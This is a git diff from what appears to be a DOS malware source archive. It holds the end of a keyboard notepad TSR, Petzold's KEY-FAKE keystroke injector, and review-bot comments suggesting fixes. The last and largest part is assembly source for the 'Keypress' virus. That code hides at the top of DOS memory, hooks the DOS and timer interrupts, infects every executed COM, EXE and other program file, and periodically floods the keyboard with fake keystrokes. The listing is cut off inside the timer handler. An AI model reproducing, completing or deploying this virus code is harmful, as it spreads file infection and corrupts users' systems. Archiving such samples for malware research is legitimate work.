+ MUL CL ;Find its location in Pad
+ MOV COMMAND_INDEX,AX ;And send to Put
+ CALL PUT ;Which will do actual stuffing
+IN: JMP OUT ;Done
+TRIGGER_ON: ;Window just turned on
+ MOV LINE,9 ;Set blinking line to bottom
+ MOV PAD_OFFSET,10*102 ;Point to screen storage part of pad
+ LEA AX,GET_CHAR ;Make IO use Get_char so current screen
+ MOV IO_CHAR,AX ;is stored
+ CALL IO ;Store Screen
+ CALL DISPLAY ;And put up the pad
+ JMP OUT ;Done here.
+NOT_TRIGGER:
+ TEST TRIGGER_FLAG,1 ;Is Trigger on?
+ JZ RUBOUT_TEST
+ MOV TAIL,BX ;Yes, delete this char from buffer
+UP: CMP DX,4800H ;An Up cursor key?
+ JNE DOWN ;No, try Down
+ DEC LINE ;Move blinker up one line
+ CMP LINE,0 ;At top? If so, reset
+ JGE NOT_TOP
+ MOV LINE,9
+NOT_TOP:CALL DISPLAY ;Display result
+ JMP OUT ;And leave
+DOWN: CMP DX,5000H ;Perhaps Down cusor key pushed
+ JNE IN ;If not, ignore key
+ INC LINE ;If so, move down one
+ CMP LINE,9 ;If at bottom, wrap to top
+ JLE NOT_BOT
+ MOV LINE,0
+NOT_BOT:CALL DISPLAY ;Show results
+ JMP OUT ;And exit
+RUBOUT_TEST:
+ CMP DX,0E08H ;Is it a Rubout?
+ JNE CHAR_TEST ;No -- try carriage return-line feed
+ MOV BX,PAD_CURSOR ;Yes -- get current pad location
+ CMP BX,9*102 ;Are we at beginning of last line?
+ JLE NEVER_MIND ;Yes -- can't rubout past beginning
+ SUB PAD_CURSOR,2 ;No, rubout this char
+ MOV PAD[BX-2],20H ;Move a space in instead (3920H)
+ MOV PAD[BX-1],39H
+NEVER_MIND:
+ JMP OUT ;Done here.
+CHAR_TEST:
+ CMP DL,13 ;Is this a carriage return?
+ JE PLUG ;If yes, plug this line into Pad
+ CMP DL,32 ;If this char < Ascii 32, delete line
+ JGE PLUG
+ MOV PAD_CURSOR,9*102 ;Clear the current line
+ MOV CX,51
+ MOV BX,9*102
+CLEAR: MOV WORD PTR PAD[BX],0
+ ADD BX,2
+ LOOP CLEAR
+ JMP OUT ;And exit
+
+PLUG: MOV BX,PAD_CURSOR ;Get current pad location
+ CMP BX,10*102-2 ;Are we past the end of the pad?
+ JGE CRLF_TEST ;Yes -- throw away char
+ MOV WORD PTR PAD[BX],DX ;No -- move ASCII code into pad
+ ADD PAD_CURSOR,2 ;Increment pad location
+CRLF_TEST:
+ CMP DX,1C0DH ;Is it a carriage return-line feed?
+ JNE OUT ;No -- put it in the pad
+ CALL CRLF ;Yes -- move everything up in pad
+OUT: POP ES ;Having done Pushes, here are the Pops
+ POP DS
+ POP SI
+ POP DI
+ POP DX
+ POP CX
+ POP BX
+ POP AX
+ IRET ;An interrupt needs an IRET
+KEEPER ENDP
+
+DISPLAY PROC NEAR ;Puts the whole pad on the screen
+ PUSH AX
+ MOV ATTRIBUTE,112 ;Use reverse video
+ MOV LINE_ATTRIBUTE,240
+ MOV PAD_OFFSET,0 ;Use 1st 250 bytes of pad memory
+ LEA AX,PUT_CHAR ;Make IO use Put-Char so it does
+ MOV IO_CHAR,AX
+ CALL IO ;Put result on screen
+ POP AX
+ RET ;Leave
+DISPLAY ENDP
+
+CRLF PROC NEAR ;This handles carriage returns
+ PUSH BX ;Push everything conceivable
+ PUSH CX
+ PUSH DI
+ PUSH SI
+ PUSH DS
+ PUSH ES
+ ASSUME DS:CODE_SEG ;Set DS to Code_Seg here
+ PUSH CS
+ POP DS
+ ASSUME ES:CODE_SEG ;And ES too
+ PUSH DS
+ POP ES
+ LEA DI,PAD ;Get ready to move contents of Pad
+ MOV SI,DI ; up one line
+ ADD SI,102 ;DI-top line, SI-one below top line
+ MOV CX,9*51
+ MOV BX,PAD_CURSOR ;But first finish line with a 0
+ CMP BX,9*102+2 ; as a flag letting Put know line is
+ JE POPS ; done.
+ MOV WORD PTR PAD[BX],0
+REP MOVSW ;Move up Pad contents
+ MOV CX,51 ;Now fill the last line with spaces
+ MOV AX,3920H
+REP STOSW ;Using Stosw
+POPS: MOV PAD_CURSOR,9*102 ;And finally reset Cursor to beginning
+ POP ES ; of the last line again.
+ POP DS
+ POP SI
+ POP DI
+ POP CX
+ POP BX
+DONE: RET ;And out.
+CRLF ENDP
+
+GET_CHAR PROC NEAR ;Gets a char from screen and advances position
+ ASSUME ES:SCREEN,DS:ROM_BIOS_DATA
+ PUSH DX
+ MOV SI,2 ;Loop twice, once for char, once for attribute
+ MOV DX,STATUS_PORT ;Get ready to read video controller status
+G_WAIT_LOW: ;Start waiting for a new horizontal scan -
+ IN AL,DX ;Make sure the video controller scan status
+ TEST AL,1 ;is low
+ JNZ G_WAIT_LOW
+G_WAIT_HIGH: ;After port has gone low, it must go high
+ IN AL,DX ;before it is safe to read directly from
+ TEST AL,1 ;the screen buffer in memory
+ JZ G_WAIT_HIGH
+ MOV AH,ES:[DI] ;Do the move from the screen, one byte at a time
+ INC DI ;Move to next screen location
+ DEC SI ;Decrement loop counter
+ CMP SI,0 ;Are we done?
+ JE LEAVE ;Yes
+ MOV PAD[BX],AH ;No -- put char we got into the pad
+ JMP G_WAIT_LOW ;Do it again
+LEAVE: MOV OLD_ATTRIBUTE,AH
+ ADD BX,2
+ POP DX
+ RET
+GET_CHAR ENDP
+
+PUT_CHAR PROC NEAR ;Puts one char on screen and advances position
+ PUSH DX
+ MOV AH,PAD[BX] ;Get the char to be put onto the screen
+ CMP AH,32
+ JAE GO
+ MOV AH,32
+GO: MOV SI,2 ;Loop twice, once for char, once for attribute
+ MOV DX,STATUS_PORT ;Get ready to read video controller status
+P_WAIT_LOW: ;Start waiting for a new horizontal scan -
+ IN AL,DX ;Make sure the video controller scan status
+ TEST AL,1 ;is low
+ JNZ P_WAIT_LOW
+P_WAIT_HIGH: ;After port has gone low, it must go high
+ IN AL,DX ;before it is safe to write directly to
+ TEST AL,1 ;the screen buffer in memory
+ JZ P_WAIT_HIGH
+ MOV ES:[DI],AH ;Move to screen, one byte at a time
+ MOV AH,ATTRIBUTE ;Load attribute byte for second pass
+ INC DI ;Point to next screen postion
+ DEC SI ;Decrement loop counter
+ JNZ P_WAIT_LOW ;If not zero, do it one more time
+ ADD BX,2
+ POP DX
+ RET ;Exeunt
+PUT_CHAR ENDP
+
+IO PROC NEAR ;This scans over all screen positions of the pad
+ ASSUME ES:SCREEN ;Use screen as extra segment
+ MOV BX,SCREEN
+ MOV ES,BX
+
+ PUSH DS
+ MOV BX,ROM_BIOS_DATA
+ MOV DS,BX
+ MOV BX,4AH
+ MOV BX,DS:[BX]
+ SUB BX,51
+ ADD BX,BX
+ MOV FIRST_POSITION,BX
+ POP DS
+
+ MOV DI,SCREEN_SEG_OFFSET ;DI will be pointer to screen postion
+ ADD DI,FIRST_POSITION ;Add width of screen minus pad width
+ MOV BX,PAD_OFFSET ;BX will be pad location pointer
+ MOV CX,10 ;There will be 10 lines
+
+LINE_LOOP:
+ PUSH WORD PTR ATTRIBUTE
+ PUSH CX ;Figure out whether this is blinking
+ NEG CX ; line and if so, temporarily change
+ ADD CX,10 ; display attribute
+ CMP CX,LINE
+ JNE NOLINE
+ MOV CL,LINE_ATTRIBUTE
+ MOV ATTRIBUTE,CL
+NOLINE: POP CX
+ MOV DX,51 ;And 51 spaces across
+CHAR_LOOP:
+ CALL IO_CHAR ;Call Put-Char or Get-Char
+ DEC DX ;Decrement character loop counter
+ JNZ CHAR_LOOP ;If not zero, scan over next character
+ ADD DI,FIRST_POSITION ;Add width of screen minus pad width
+
+ POP WORD PTR ATTRIBUTE
+ LOOP LINE_LOOP ;And now go back to do next line
+ RET ;Finished
+IO ENDP
+
+PUT PROC NEAR ;Here it is.
+ ASSUME DS:ROM_BIOS_DATA ;Free DS
+ PUSH DS ;Save all used registers
+ PUSH SI
+ PUSH DI
+ PUSH DX
+ PUSH CX
+ PUSH BX
+ PUSH AX
+ MOV AX,ROM_BIOS_DATA ;Just to make sure
+ MOV DS,AX ;Set DS correctly
+FIN: MOV FINISHED_FLAG,1 ;Assume we'll finish
+ MOV BX,TAIL ;Prepare to move to buffer's tail
+ MOV SI,COMMAND_INDEX ;Get our source index
+
+STUFF: MOV AX,WORD PTR PAD[SI]
+ ADD SI,2 ;Point to the command's next character
+ CMP AX,0 ;Is it a zero? (End of command)
+ JE NO_NEW_CHARACTERS ;Yes, leave with Finished_Flag=1
+ MOV DX,BX ;Find position in buffer from BX
+ ADD DX,2 ;Move to next position for this word
+ CMP DX,OFFSET BUFFER_END ;Are we past the end?
+ JL NO_WRAP2 ;No, don't wrap
+ MOV DX,OFFSET BUFFER ;Wrap
+NO_WRAP2:
+ CMP DX,HEAD ;Buffer full but not yet done?
+ JE BUFFER_FULL ;Time to leave, set Finished_Flag=0.
+ ADD COMMAND_INDEX,2 ;Move to next word in command
+ MOV [BX],AX ;Put it into the buffer right here.
+ ADD BX,2 ;Point to next space in buffer
+ CMP BX,OFFSET BUFFER_END ;Wrap here?
+ JL NO_WRAP3 ;No, readjust buffer tail
+ MOV BX,OFFSET BUFFER ;Yes, wrap
+NO_WRAP3:
+ MOV TAIL,BX ;Reset buffer tail
+ JMP STUFF ;Back to stuff in another character.
+BUFFER_FULL: ;If buffer is full, let timer take over
+ MOV FINISHED_FLAG,0 ; by setting Finished_Flag to 0.
+NO_NEW_CHARACTERS:
+ POP AX ;Restore everything before departure.
+ POP BX
+ POP CX
+ POP DX
+ POP DI
+ POP SI
+ POP DS
+ STI
+ RET
+PUT ENDP
+
+ ASSUME DS:CODE_SEG
+INTERCEPT_TIMER PROC NEAR ;This completes filling the buffer
+ PUSHF ;Store used flags
+ PUSH DS ;Save DS since we'll change it
+ PUSH CS ;Put current value of CS into DS
+ POP DS
+ CALL ROM_TIMER ;Make obligatory call
+ PUSHF
+ CMP FINISHED_FLAG,1 ;Do we have to do anything?
+ JE OUT1 ;No, leave
+ CLI ;Yes, start by clearing interrupts
+ PUSH DS ;Save these.
+ PUSH SI
+ PUSH DX
+ PUSH BX
+ PUSH AX
+ ASSUME DS:ROM_BIOS_DATA ;Point to the keyboard buffer again.
+ MOV AX,ROM_BIOS_DATA
+ MOV DS,AX
+ MOV BX,TAIL ;Prepare to put characters in at tail
+ MOV FINISHED_FLAG,1 ;Assume we'll finish
+ MOV SI,COMMAND_INDEX ;Find where we left ourselves
+
+STUFF2: MOV AX,WORD PTR PAD[SI] ;The same stuff loop as above.
+ ADD SI,2 ;Point to next command character.
+ CMP AX,0 ;Is it zero? (end of command)
+ JNE OVER ;No, continue.
+ JMP NO_NEW_CHARACTERS2 ;Yes, leave with Finished_Flag=1
+OVER: MOV DX,BX ;Find position in buffer from BX
+ ADD DX,2 ;Move to next position for this word
+ CMP DX,OFFSET BUFFER_END ;Are we past the end?
+ JL NO_WRAP4 ;No, don't wrap
+ MOV DX,OFFSET BUFFER ;Do the Wrap rap.
+NO_WRAP4:
+ CMP DX,HEAD ;Buffer full but not yet done?
+ JE BUFFER_FULL2 ;Time to leave, come back later.
+ ADD COMMAND_INDEX,2 ;Point to next word of command.
+ MOV [BX],AX ;Put into buffer
+ ADD BX,2 ;Point to next space in buffer
+ CMP BX,OFFSET BUFFER_END ;Wrap here?
+ JL NO_WRAP5 ;No, readjust buffer tail
+ MOV BX,OFFSET BUFFER ;Yes, wrap
+NO_WRAP5:
+ MOV TAIL,BX ;Reset buffer tail
+ JMP STUFF2 ;Back to stuff in another character
+BUFFER_FULL2:
+ MOV FINISHED_FLAG,0 ;Set flag to not-done-yet.
+NO_NEW_CHARACTERS2:
+ POP AX ;Restore these.
+ POP BX
+ POP DX
+ POP SI
+ POP DS
+OUT1: POPF ;And Exit.
+ POP DS
+ IRET ;With customary IRET
+INTERCEPT_TIMER ENDP
+
+LOAD_KEEPER PROC NEAR ;This procedure intializes everything
+ ASSUME DS:VECTORS ;The data segment will be the Interrupt area
+ MOV AX,VECTORS
+ MOV DS,AX
+
+ MOV AX,KEYBOARD_INT ;Get the old interrupt service routine
+ MOV OLD_KEYBOARD_INT,AX ;address and put it into our location
+ MOV AX,KEYBOARD_INT[2] ;OLD_KEYBOARD_INT so we can call it.
+ MOV OLD_KEYBOARD_INT[2],AX
+
+ MOV KEYBOARD_INT,OFFSET KEEPER ;Now load the address of our notepad
+ MOV KEYBOARD_INT[2],CS ;routine into the keyboard interrupt
+
+ MOV AX,TIMER_VECTOR ;Now same for timer
+ MOV ROM_TIMER,AX
+ MOV AX,TIMER_VECTOR[2]
+ MOV ROM_TIMER[2],AX
+
+ MOV TIMER_VECTOR,OFFSET INTERCEPT_TIMER
+ MOV TIMER_VECTOR[2],CS ;And intercept that too.
+
+ ASSUME DS:ROM_BIOS_DATA
+ MOV AX,ROM_BIOS_DATA
+ MOV DS,AX
+ MOV BX,OFFSET BUFFER ;Clear the keyboard buffer.
+ MOV HEAD,BX
+ MOV TAIL,BX
+ MOV AH,15 ;Ask for service 15 of INT 10H
+ INT 10H ;This tells us how display is set up
+ MOV STATUS_PORT,03BAH ;Assume this is a monochrome display
+ TEST AL,4 ;Is it?
+ JNZ EXIT ;Yes - jump out
+ MOV SCREEN_SEG_OFFSET,8000H ;No - set up for graphics display
+ MOV STATUS_PORT,03DAH
+
+EXIT: MOV DX,OFFSET LOAD_KEEPER ;Set up everything but LOAD_PAD to
+ INT 27H ;stay and attach itself to DOS
+LOAD_KEEPER ENDP
+
+ CODE_SEG ENDS
+
+ END FIRST ;END "FIRST" so 8088 will go to FIRST first.
+
+
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.key-fake.asm b/MSDOS/Virus.MSDOS.Unknown.key-fake.asm
new file mode 100644
index 00000000..ddce0316
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.key-fake.asm
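Review bot: In INTERCEPT_TIMER the `PUSHF` meant to pair with the far `CALL ROM_TIMER` is separated from it by `PUSH DS`, so the chained handler's IRET pops the saved DS as its flags image, and the stale flags word is what `POP DS` at OUT1 later loads into DS. KEEPER gets the same sequence right (`PUSHF` immediately before `CALL OLD_KEYBOARD_INT`); the timer entry should push DS first and move the `PUSHF` to directly precede `CALL ROM_TIMER`, after the `POP DS`. The corruption is probably masked in practice because INT 1Ch is normally raised from inside the BIOS INT 08h handler, which saves and restores its own DS, but any code that invokes INT 1Ch directly would return with DS clobbered. Separately, LOAD_KEEPER rewrites the INT 9 and INT 1Ch vectors word by word with interrupts enabled, so a tick or keystroke landing between the offset and segment stores would dispatch through a half-updated vector; bracket each pair of stores with `CLI`/`STI`.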
@@ -0,0 +1,247 @@ +; KEY-FAKE.ASM -- Fakes keystrokes from internal keyboard buffer. +; ============ + +CSEG Segment + Assume CS:CSEG + Org 0100h +Entry: Jmp Initialize + +; Most Resident Data +; ------------------ + + db 'KEY-FAKE (C) Copyright Charles Petzold, 1985' +SearchLabelEnd Label Byte + +OldInterrupt16 dd 0 +Pointer dw Offset KeyStrokeBuffer +Counter db 0 + +; New Interrupt 16 (Keyboard) +; --------------------------- + +NewInterrupt16 Proc Far + + Sti ; Allow futher interrupts + Cmp CS:[Counter],0 ; See if characters in buffer + Jz DoOldInterrupt ; If not, just do regular interrupt + + Or AH,AH ; Check if AH is zero + Jz GetCharacter ; If so, call is to get character + + Cmp AH,1 ; Check if AH is one + Jz GetStatus ; If so, call is for status + +DoOldInterrupt: Jmp CS:[OldInterrupt16] ; Otherwise, go away + +GetCharacter: Push BX + Mov BX,CS:[Pointer] ; BX points to current buffer position + Mov AX,CS:[BX] ; Get ASCII code and scan code + Inc BX ; Move buffer pointer ahead + Inc BX + Mov CS:[Pointer],BX ; Save new pointer + Dec CS:[Counter] ; One less character in counter + Pop BX + + Or AX,AX ; See if 0 returned + Jz NewInterrupt16 ; If so, take it from the top again + + IRet ; Return to calling program + +GetStatus: Push BX + Mov BX,CS:[Pointer] ; BX points to current buffer position + Mov AX,CS:[BX] ; Get ASCII code and scan code + Pop BX + + Or AX,AX ; See if special 0 keystroke + Jnz StatusReturn ; If not, return non-zero flag + + Add CS:[Pointer],2 ; If so, skip over it + Dec CS:[Counter] ; One less character + Or AX,AX ; Will set zero flag + +StatusReturn: Ret 2 ; Do not pop flags + +NewInterrupt16 EndP + +; Beginning of Key Stroke Buffer +; ------------------------------ + +KeyStrokeBuffer Label Byte ; 256 Byte Buffer for keystrokes + +; Initialization -- Search through Memory and see if label matches +; ---------------------------------------------------------------- +; +; If so, use the loaded program; if not, create a new interrupt + + Assume 
DS:CSEG, ES:CSEG, SS:CSEG + +Initialize: Mov Word Ptr [Entry],0 ; Slightly modify search label + Mov Byte Ptr [Entry + 2],0 ; so no false matches + + Cld + Mov DX,CS ; This segment + Sub AX,AX ; Beginning of search + Mov ES,AX ; Search segment + +SearchLoop: Mov SI,100h ; Address to search + Mov DI,SI ; Set pointers to same address + Mov CX,Offset SearchLabelEnd - Offset Entry + Repz Cmpsb ; Check for match + Jz ReadyForDecode ; If label matches + + Inc AX ; Still the search segment + Mov ES,AX ; ES to next segment + + Cmp AX,DX ; Check if it's this segment + Jnz SearchLoop ; Try another compare + + Mov Byte Ptr DS:[1],27h ; Since no match found, + ; set up PSP for Terminate & + ; remain resident. + +; Save and Set Interupt 16 if Staying Resident +; -------------------------------------------- + + Sub AX,AX ; Set AX to zero + Mov DS,AX ; To access vector segment + Assume DS:Nothing ; Tell the assembler + + Mov AX,Word Ptr DS:[16h * 4] ; Get vector offset + Mov Word Ptr CS:[OldInterrupt16],AX ; Save it + Mov AX,Word Ptr DS:[16h * 4 + 2] ; Get vector segment + Mov Word Ptr CS:[OldInterrupt16 + 2],AX ; and save it + + Cli ; Don't interrupt me + Mov DS:[16h * 4],Offset NewInterrupt16 ; Store new + Mov DS:[16h * 4 + 2],CS ; address + Sti ; Now you can talk + + Push CS + Pop DS ; Restore DS + Assume DS:CSEG + +; Parameter decoding when program segment has been found +; ------------------------------------------------------ +; +; ES = segment of loaded program (could be CS) + +ReadyForDecode: Mov SI,80h ; SI points to parameter area + Mov DI,Offset KeyStrokeBuffer + Mov ES:[Pointer],DI ; ES:DI points to buffer area + Mov ES:[Counter],0 ; Set keystroke counter to zero + + Lodsb ; Get parameter count + Cbw ; Convert to word + Mov CX,AX ; CX = parameter count + Inc CX ; So catch last delimiter (0D) + Or AX,AX ; Check if parameter present + Jnz GoDecodeLoop ; If so, continue + Jmp EndDecode ; If not, cut out + +GoDecodeLoop: Jmp DecodeLoop + +; End of Residence is end of Key 
Stroke Buffer +; -------------------------------------------- + + Org 256 + Offset KeyStrokeBuffer + +EndResidence Label Byte + +; Data for Parameter Decoding +; --------------------------- + +QuoteSign db 0 ; Flag for quoted strings +DoingNumber db 0 ; Flag for doing a number +DoingExtended db 0 ; Flag for doing extended ASCII +CalcNumber db 0 ; A calculated number +Ten db 10 ; For MUL convenience + +; Routine for doing quoted text +; ----------------------------- + +DecodeLoop: Lodsb ; Get character + Cmp [QuoteSign],0 ; Check if doing quoted text + Jz NotDoingQuote ; If not, continue checks + + Cmp AL,[QuoteSign] ; Check first if character is quote + Jz EndQuote ; If so, finish quoted text + + Sub AH,AH ; Set scan code to zero + Stosw ; Save it in buffer + Inc ES:[Counter] ; One more character + Jmp DoNextCharacter ; Go to bottom of routine + +EndQuote: Mov [QuoteSign],0 ; End of quoted text + Jmp DoNextCharacter ; Get the next character + +; Routine for Extended Ascii Character (@) +; ---------------------------------------- + +NotDoingQuote: Cmp AL,'@' ; See if character is for extended + Jnz NotExtended ; If not, hop over a little code + + Mov [DoingExtended],1 ; Flag for extended ASCII + Jmp Delimiter ; To possibly dump number + +; Routine for Quote Sign ' or " +; ----------------------------- + +NotExtended: Cmp AL,'"' ; Check for a double quote sign + Jz Quote + Cmp AL,"'" ; Check for a single quote sign + Jnz NotAQuote + +Quote: Mov [QuoteSign],AL ; Save the quote sign + Jmp Delimiter ; To possibly dump number + +; Routine for decimal number +; -------------------------- + +NotAQuote: Cmp AL,'0' ; See if character >= 0 + Jb Delimiter + Cmp AL,'9' ; See if character <= 9 + Ja Delimiter + + Mov [DoingNumber],1 ; If so, doing number + + Sub AL,'0' ; Convert to binary + Xchg AL,[CalcNumber] ; Get previously calculated + Mul [Ten] ; Multiply by 10 + Add [CalcNumber],AL ; Add it to new digit + + Jmp DoNextCharacter ; And continue + +; Anything else is 
considered a delimiter +; --------------------------------------- + +Delimiter: Cmp [DoingNumber],1 ; Check if doing a number + Jnz DoNextCharacter ; If not, do not dump + + Mov AL,[CalcNumber] ; Set AX to ASCII number + Sub AH,AH ; Zero out scan code part + Cmp [DoingExtended],1 ; Check if doing scan code + Jnz NumberOK + + Xchg AL,AH ; Switch ASCII and scan code + +NumberOK: Stosw ; Store the two codes + Inc ES:[Counter] ; One more character in buffer + + Mov [DoingNumber],0 ; Clear out all flags + Mov [DoingExtended],0 + Mov [CalcNumber],0 + +DoNextCharacter:Dec CX ; One less character to do + Jz EndDecode ; If no more, we're done + Jmp DecodeLoop ; Otherwise, get next one + +; End Decode -- Ready to terminate (and possibly stay resident) +; ------------------------------------------------------------- + +EndDecode: Mov DX,Offset EndResidence ; End of resident part + Ret ; Int 20h or 27h + +CSEG EndS + + End Entry + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.keypress.asm b/MSDOS/Virus.MSDOS.Unknown.keypress.asm new file mode 100644 index 00000000..dfa93406 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.keypress.asm 
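Review bot: Initialize decides that a resident copy exists by comparing the label at offset 100h of every paragraph from segment 0 up to CS (`SearchLoop`) and accepts the first match without checking that the segment really holds the installed handler; a stale copy of the file in a disk buffer, or this source loaded in an editor, would match and ReadyForDecode would then write `Pointer`, `Counter` and the keystroke buffer into that unrelated memory. Before taking `Jz ReadyForDecode`, confirm the candidate by comparing AX with the segment half of the INT 16h vector at `0:[16h*4+2]`, which can only equal the candidate if NewInterrupt16 was installed from it. A comment on `SearchLoop` should also record that the label bytes at `[Entry]` are zeroed first so the running copy never matches itself, since that is the only thing stopping a false positive at CS.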
@@ -0,0 +1,739 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +;******************************************************** +; Source code of the Keypress Virus - Made by XSTC +; Made in A86 v3.07 +; +; The Keypress Virus installs itself in top of DOS +; memory, without using DOS resident functions. It will +; hook int 1Ch (timer) and 21h (DOS) and will copy every +; 10 minutes during 2 seconds the keys you press five +; times (so if you press '1' it will be '111111') - if +; you press no key, it will usually give ESCs. +; +; In DOS 3+ it spreads to every file executed - so it +; can, besides COM/EXE, infect DRV/OVL/etc. +; It also spreads itself in DOS 1 and 2 with a special +; routine - in this case only COM/EXE files will be +; infected. +; +; It adds, after making full paragraphs of the file +; length, 1232 bytes to COM-files and 1216 to EXE. +; +; This code is only made to show the possibilities and +; dangers of a virus. It is only intended for research +; purposes - spreading a virus is prohibited by law. 
+; +; NOTE - The compiled code is not 100% compatible with +; the Keypress virus. A86 compiles the 'ADD BX,AX' and +; 'MOV DI,SI' different. This has totally no effect +; on the program. +;******************************************************** + +; After compiling the new virus, enter the new size in paragraphs in VirParSize +; and compile again. + +VirParSize equ 4Ch ; Size of the original KeyPress virus + +VirStart: jmp long VirBegin + db 0 + +ComStart: mov bx,cs ; When the virus has infected a .COM file, + add bx,[102h] ; this is the jump to the virus. Actually, + push bx ; this code is overwritten with the code + mov bx,offset VirBegin ; in the end of the virus. + push bx + retf + +EB02 dw 02EBh ; 'jmp 104' - first 2 bytes in .COM file + +VirSize dw VirParSize shl 4 ; Size of virus in whole pars + +VirPars dw VirParSize + 1 ; Size of virus in pars+1 + +MaxComSize dw 0FF00h-VirParSize ; Max. size .COM file to infect (100h stack) + +Com_or_exe db 00h ; 0 = Com-File, 1 = Exe-File +R_Ax dw (?) +R_Bx dw (?) +R_Cx dw (?) +R_Dx dw (?) +R_Di dw (?) +R_Si dw (?) +R_Bp dw (?) +R_Es dw (?) +R_Ds dw (?) +R_SS dw (?) +R_SP dw (?) + +Exe_CS dw (?) +Exe_IP dw (?) + + +VirBegin: call Save_Regs ; Start of virus + call Fix_cs_ss ; Fix CS and SS of orig. prog (for .EXE files) + call Get_cs_ip ; Get CS and IP of original prog + call Check_res ; Check virus already resident + jb Exit_inst ; Yes, quit + + call Inst_mem ; Install in memory + jb Exit_inst ; Error, quit + + call Inst_ints ; Hook interrupts +Exit_Inst: jmp short Rst_regs_prg + nop + +Jmp_Prg: db 0EAh ; Jump to original program +PrgOfs dw (?) +PrgSeg dw (?) + +Check_res: push ds + xor bx,bx + mov ds,bx + mov bx,600h ; Unused word in memory + cmp word ptr [bx],1 ; Already installed? 
+ jz Installed ; Yes + + mov word ptr [bx],1 ; No + stc + +Installed: cmc + pop ds + ret + + +;*** For .EXE: Fix orig-prog CS and SS *** + +Fix_cs_ss: test byte ptr [Com_or_exe],1 + jz no_exe + + mov ax,es + add ax,10h + add Exe_cs,ax + add R_ss,ax + +No_Exe: ret + + +;*** Get CS + IP of orig. program, and for .COM: Restore first 16 bytes *** + +Get_cs_ip: mov ax,[Exe_cs] + mov bx,[Exe_ip] + test byte ptr [Com_or_exe],1 + jnz No_rest ; .EXE file: no restore of first bytes + + mov ax,es + mov bx,100h + mov cx,10h + mov si,offset First_bytes + mov di,100h + cld + repz ; Restore first 16 bytes (.COM file) + movsb + +No_rest: mov [Prgseg],ax + mov [Prgofs],bx + ret + + +;*** Proc: Save the registers to restore them after the virus has ended *** + +Save_Regs: mov cs:R_ds,ds + push cs + pop ds + mov R_ax,ax + mov R_bx,bx + mov R_cx,cx + mov R_dx,dx + mov R_di,di + mov R_si,si + mov R_bp,bp + mov R_es,es + ret + + +;*** Restore regs for original program *** + +Rst_regs_prg: mov ax,R_ax + mov bx,R_bx + mov cx,R_cx + mov dx,R_dx + mov bp,R_bp + mov di,R_di + mov si,R_si + mov es,R_es + test byte ptr [Com_or_exe],1 + jz No_StackRest ; No stack restore for .COM files + + cli + mov ss,[R_ss] ; Restore .EXE stack + mov sp,[R_sp] + sti + +No_StackRest: mov ds,R_ds + jmp short jmp_prg + + +;*** Restore regs for interrupts *** + +Rst_regs_int: mov ax,R_ax + mov bx,R_bx + mov cx,R_cx + mov dx,R_dx + mov bp,R_bp + mov di,R_di + mov si,R_si + mov es,R_es + mov ds,R_ds + ret + + +;*** Proc: Search for last MCB *** + +Last_MCB: push ds + mov bx,es + dec bx + +Next_MCB: mov ds,bx + cmp byte ptr [0],5Ah ; Last MCB? + jz Is_last ; Yes + inc bx + add bx,[3] ; Go to next + cmp bx,0A000h ; In ROM? + jb Next_MCB ; No, try next one + +Is_Last: pop ds + ret + + +;*** Proc: Install virus in end of memory *** + +Inst_Mem: call Last_mcb ; Search last MCB + cmp bx,0A000h ; In ROM? 
+ jb Not_ROM ; No, continue + +No_Inst: push cs ; Yes, quit + pop ds + stc ; Error, virus not installed + ret + +Not_ROM: mov ds,bx + mov ax,[3] ; AX = Size last MCB + sub ax,cs:[VirPars] ; - (Virussize in pars+1) + jbe no_inst ; Not enough memory, quit + cmp ax,800h + jb no_inst ; Less than 2048 pars free, quit + mov [3],ax ; Give program less space to install virus + add bx,ax + inc bx ; BX = seg where virus comes + mov es:[2],bx ; Enter in PSP, program not allowed there + sub bx,10h ; - 10h pars (virus starts at 100h) + push bx + push cs + pop ds + pop es + mov si,100h + mov di,si + mov cx,[VirSize] ; CX = virussize + cld + repz ; Copy virus to virus-segment + movsb + clc ; No error, virus installed + ret + + +;*** Install new interrupts (1C - Timer Tick, 21 - DOS) *** + +Inst_Ints: push es + pop ds + mov word ptr [Ticks],0 + mov ax,351Ch ; Get Addr Timer Tick + int 21h + mov I1c_ofs,bx + mov I1c_seg,es + mov ax,3521h ; Get Addr DOS-Int + int 21h + mov I21_ofs,bx + mov I21_seg,es + mov ax,251Ch + mov dx,offset New_I1c + int 21h ; Install New Timer-Tick Int + mov dx,offset I21_dos12 + push dx + mov ah,30h ; Get DOS-Version + int 21h + pop dx + cmp al,3 ; Below 3.0? + jb DosBel3 + mov dx,offset new_I21 ; No, new int +DosBel3: mov ax,2521h ; Install new DOS-Int + int 21h + push cs + pop ds + ret + + +;*** Proc: NEW 1C (TIMER TICK) INTERRUPT *** +; Every 10 minutes this routine sends during 2 sec. 180 extra keys to the +; keyboard-interrupt. + +Ticks dw (?) + +New_I1c: inc word ptr cs:[Ticks] ; Increment 'Ticks after virus loaded' + cmp word ptr cs:[Ticks],2A30h ; 10 minutes passed? + jb org_I1c ; No, go to orig. I1c + cmp word ptr cs:[Ticks],2A54h ; 2 sec. passed? + jbe screw_keys ; Not yet, give ESCs + mov word ptr cs:[Ticks],0 ; Time-counter to 0 + jmp short Org_I1c ; Go to orig. I1c +Screw_Keys: push cx + mov cx,5 ; 5 times / tick +Put_Key: int 9 ; Give extra key + loop Put_key + pop cx +Org_I1c: db 0EAh ; Jump far to orig. I1c +I1c_Ofs dw (?) +I1c_Seg dw (?) 
